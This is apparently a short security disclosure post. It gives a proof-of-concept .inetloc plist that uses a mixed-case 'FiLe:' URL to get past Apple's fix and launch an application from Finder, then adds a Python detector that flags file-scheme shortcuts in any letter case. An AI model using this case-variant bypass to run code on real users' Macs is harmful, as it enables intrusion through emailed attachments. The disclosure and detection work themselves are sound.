POC: A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands. These files can be embedded inside emails, and if the user clicks on them, the commands embedded inside them will execute without providing a prompt or warning to the user.
Code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
btw Apple has fixed the "file" prefix, but you can still use FiLe or FIle, etc.
Credits: https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/
An independent security researcher, Park Minchan, has reported this vulnerability to the SSD Secure Disclosure program.
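The post above shows that the patch only matched the lowercase "file" scheme, so any case variant still slips through. The following is an added detection example, not code from the post or from the SSD advisory: it parses an .inetloc file as a plist, normalises the URL scheme case-insensitively before comparing it against "file", and reports the filesystem path the shortcut would open. The sample inputs are constructed here (the first one mirrors the PoC plist shown in the post); the function names are my own.

```python
import plistlib
from typing import Optional

# Constructed sample: the PoC from the post, with a mixed-case scheme.
POC_INETLOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
"""

# Constructed sample: an ordinary web shortcut, which should not be flagged.
BENIGN_INETLOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>URL</key>
<string>https://example.com/</string>
</dict>
</plist>
"""


def inetloc_url(data: bytes) -> Optional[str]:
    """Return the URL string stored in an .inetloc plist, or None when the
    bytes are not a plist dictionary carrying a string 'URL' key."""
    try:
        plist = plistlib.loads(data)
    except Exception:
        return None
    if not isinstance(plist, dict):
        return None
    url = plist.get("URL")
    return url if isinstance(url, str) else None


def url_scheme(url: str) -> str:
    """Scheme of a URL, lowercased and stripped of surrounding whitespace,
    so that 'FiLe:', 'FIle:' and ' file:' all compare equal to 'file'.
    A plain prefix match on the literal 'file' is exactly the check the
    post says was bypassed."""
    head, sep, _ = url.partition(":")
    return head.strip().lower() if sep else ""


def file_target(url: str) -> str:
    """For a file-scheme URL, collapse the run of slashes after the scheme
    into a single absolute path (the PoC pads the path with many slashes)."""
    _, _, rest = url.partition(":")
    return "/" + rest.lstrip("/")


def assess_inetloc(data: bytes) -> dict:
    """Classify an .inetloc payload: 'unparsed' (not a usable plist),
    'suspicious' (file scheme in any letter case) or 'ok' (other scheme)."""
    url = inetloc_url(data)
    if url is None:
        return {"status": "unparsed", "url": None, "target": None}
    if url_scheme(url) == "file":
        return {"status": "suspicious", "url": url, "target": file_target(url)}
    return {"status": "ok", "url": url, "target": None}


if __name__ == "__main__":
    for name, sample in (("poc", POC_INETLOC), ("benign", BENIGN_INETLOC)):
        print(name, assess_inetloc(sample))
```

Running the block prints a "suspicious" verdict for the PoC sample, with the target resolved to /System/Applications/Calculator.app, and "ok" for the https shortcut. The same functions can be pointed at attachments extracted from mail or at a directory of .inetloc files; the important design choice is that the scheme is compared after lowercasing rather than by a literal prefix match.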